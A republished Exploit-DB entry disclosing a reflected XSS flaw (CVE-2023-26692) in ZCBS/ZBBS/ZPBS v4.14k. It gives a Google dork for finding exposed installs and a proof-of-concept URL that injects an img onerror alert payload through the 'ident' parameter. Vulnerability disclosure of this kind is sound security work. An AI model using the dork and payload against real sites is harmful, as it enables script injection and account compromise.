ZCBS/ZBBS/ZPBS v4.14k – Reflected Cross-Site Scripting (XSS)

• Exploit Database
• 113 阅读

• 作者： Abdulaziz Saad
  日期： 2023-04-08
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/51347/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) # Date: 2023-03-30 # CVE: CVE-2023-26692 # Exploit Author: Abdulaziz Saad (@b4zb0z) # Vendor Homepage: https://www.zcbs.nl # Version: 4.14k # Tested on: LAMP, Ubuntu # Google Dork: inurl:objecten.pl?ident=3D   ---   [#] Vulnerability : $_GET['ident'] [#] Exploitation : https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= =3Dalert(%22XSS%22)%3E